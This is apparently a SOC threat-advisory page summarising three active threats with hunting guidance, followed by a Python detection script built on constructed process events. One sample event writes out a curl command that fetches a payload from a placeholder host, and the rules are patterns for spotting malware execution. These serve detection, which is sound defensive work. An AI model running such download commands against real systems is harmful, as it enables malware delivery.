Urgent Threats & Advisories

Active and archived focus items for SOC teams and threat hunters

ACTIVE RIGHT NOW

CRITICAL | ADVISORY | 3h ago

‼️🇺🇸 A well-known initial access broker is selling root-level remote code execution access to a...

An initial access broker is actively selling root-level RCE access to a compromised firewall at a major US aerospace and defense contractor ($20B+ valuation). The $1,000 price point indicates commodity-level access, suggesting multiple buyers may already have control. This represents direct compromise of critical infrastructure with immediate risk of lateral movement into defense supply chain networks.

Action required
Immediately hunt for indicators of compromise on all firewall management interfaces, VPNs, and network edge devices. Prioritize: review firewall logs for suspicious admin access, check for persistence mechanisms, audit all outbound connections from perimeter devices, and assume lateral movement has occurred until proven otherwise.
CRITICAL | ADVISORY | 3h ago

Russian Forest Blizzard Hackers Hijack Home Routers for Global Spying

Russian military-linked Forest Blizzard actors have compromised over 5,000 SOHO routers globally since August 2025 to hijack DNS and intercept traffic. They're actively targeting Microsoft Outlook users across energy, IT, and telecom sectors, affecting 200 organizations including government agencies. Remote workers and any organization using compromised routers are at risk of credential theft and persistent surveillance.

Action required
Immediately audit all SOHO and remote access routers for unauthorized dnsmasq configurations or suspicious DNS settings. Check for any Outlook session compromises and force password resets for users accessing email from home networks. Query proxy and firewall logs for DNS traffic anomalies and unexpected MITM indicators.
Microsoft, Microsoft Outlook
CRITICAL | ADVISORY | 3h ago

New ClickFix Attack Uses Node.js Malware via Tor to Steal Crypto

ClickFix is a professional MaaS operation delivering a Node.js-based RAT through fake CAPTCHA prompts on Windows systems. The malware uses Tor for C2, hides in memory, and targets crypto wallets after checking for 30+ security products. This is a high-volume social engineering attack with real theft operations already underway.

Action required
Hunt for Node.js processes spawned from browser or download directories, Tor traffic from endpoints, and gRPC connections to unknown hosts. Block known ClickFix C2 IPs and domains. Check for suspicious execution of legitimate tools (Node.js, npm, curl) used as links in the infection chain.
Netskope, Windows Defender
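As an added illustration of the hunt described in the ClickFix item (example code, not part of the advisory), the following Python rule set flags process-creation events that match the patterns listed there: Node.js spawned by a browser, Node.js or its script running from a download or temp directory, and curl writing into such a directory. The Sysmon-style events, user paths and the `.invalid` URL are constructed samples.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation events for illustration only; not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Program Files\nodejs\node.exe",
     "parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\nodejs\node.exe" C:\Users\alice\Downloads\verify.js'},
    {"id": 2, "image": r"C:\Users\bob\AppData\Local\Temp\node.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Users\bob\AppData\Local\Temp\node.exe -e ..."},
    {"id": 3, "image": r"C:\Program Files\nodejs\node.exe",  # benign developer activity
     "parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "cmdline": r'"C:\Program Files\nodejs\node.exe" C:\dev\app\server.js'},
    {"id": 4, "image": r"C:\Windows\System32\curl.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"curl.exe -o C:\Users\alice\Downloads\n.zip http://placeholder.invalid/n.zip"},
]

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
NODE_TOOLS = {"node.exe", "npm.cmd", "npx.cmd"}
USER_WRITABLE = re.compile(r"\\(downloads|temp|appdata)\\", re.IGNORECASE)

def exe_name(path: str) -> str:
    """Lower-case file name of an image path, ignoring surrounding quotes."""
    return ntpath.basename(path.strip('"')).lower()

def evaluate(event: dict) -> list[str]:
    """Return the hunting rules an event matches (empty list = not flagged by these rules)."""
    reasons = []
    image, parent = exe_name(event["image"]), exe_name(event["parent"])
    if image in NODE_TOOLS:
        if parent in BROWSERS:
            reasons.append("node spawned by a browser")
        if USER_WRITABLE.search(event["image"]):
            reasons.append("node binary runs from a user-writable directory")
        if USER_WRITABLE.search(event["cmdline"]):
            reasons.append("node loads a script from a user-writable directory")
    elif image == "curl.exe" and USER_WRITABLE.search(event["cmdline"]):
        reasons.append("curl writing a download into a user-writable directory")
    return reasons

def hunt(events: list[dict]) -> dict[int, list[str]]:
    """Map event id -> matched reasons for every event that trips at least one rule."""
    return {e["id"]: r for e in events if (r := evaluate(e))}

if __name__ == "__main__":
    for event_id, reasons in hunt(SAMPLE_EVENTS).items():
        print(event_id, "; ".join(reasons))
```

Events 1, 2 and 4 are flagged; the VS Code-launched Node.js process (event 3) is not, which is the distinction the rule set is meant to draw.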

ARCHIVE
